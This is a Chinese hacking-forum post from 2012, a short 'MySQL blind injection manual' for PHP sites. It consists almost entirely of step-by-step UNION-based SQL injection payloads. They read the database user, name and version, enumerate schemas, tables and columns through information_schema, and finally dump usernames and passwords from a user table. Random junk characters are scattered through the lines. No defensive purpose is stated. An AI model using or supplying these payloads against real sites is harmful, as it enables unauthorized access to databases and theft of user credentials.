找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2122|回复: 0
打印 上一主题 下一主题

mysql盲注手册

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:27:53 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
" N  e0 t0 x0 a; l. z. R# t
教程内容:Mysql 5+php 注入
( Q! `% k  I7 b+ a
/ k$ d+ F) w# f& J5 [
7 L- B6 X; Y' h/ Y4 _- ^
2 ~! q& v9 V( |6 a. U2 p& t一.查看MYSQL基本信息(库名,版本,用户)& l$ U  V) [6 H! ^- W
% K& W0 O) |# ^5 {( ~
and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*  M6 j+ K4 F6 W. S! Q3 Y+ K& n
" R: {7 \2 L1 S; H7 e
二.查数据库) U7 f* k! Z5 E5 u$ o& m  C
0 N& X9 `" z- p9 B
and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8  from information_schema.SCHEMATA limit 1,1/*
# g1 X) V( H9 q% v% G  hlimit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。
" d: @6 a9 s. X& y
. R& ?: W# h* m2 \6 [三.暴表
/ ?( |& K; w$ P& t2 S
% p7 ?2 m4 M% S& ?and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*
: _/ G) E" M; M( h+ ]2 v( L. A; d8 a! }: K- O% K8 ?
limit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。6 \5 B+ a5 b/ t
) C& ]8 Q1 t: S! D
四.暴字段9 n+ N+ Y8 r* S1 c) R& \& r
* _8 I! ^! C" C' J, `6 {/ h. V
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*
, k+ G1 Z* |3 Y8 a8 j- q1 N, x3 v/ }; E1 e( e" c- i1 N
limit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。
2 b! v! l: A* d4 r" n% B6 h5 i' W. `8 }& ~! d$ M  B0 c
五.暴数据
7 u$ w. H7 H& ]4 }
6 v8 a" @# r' H! h  rand 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*
4 V: X. s/ c* J, N- R" L8 M4 U# K& _

# N$ x5 \8 ?* }这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。, I" y/ Z# @% c* g+ o" r6 T
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表